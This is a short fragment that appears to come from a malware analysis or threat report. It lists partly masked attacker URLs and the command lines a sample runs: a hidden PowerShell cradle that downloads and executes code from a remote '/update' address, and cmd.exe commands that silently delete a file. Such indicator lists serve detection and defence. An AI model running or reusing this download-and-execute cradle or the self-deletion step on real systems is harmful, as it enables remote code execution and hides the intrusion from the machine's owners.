Technical Information
- http://19#.##.163.48:80/update
- http://19#.#4.163.48/update
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://19#.##.163.48:80/update'))"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c del /q /a "<Full path to file>"' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c del /q /a "<Full path to file>"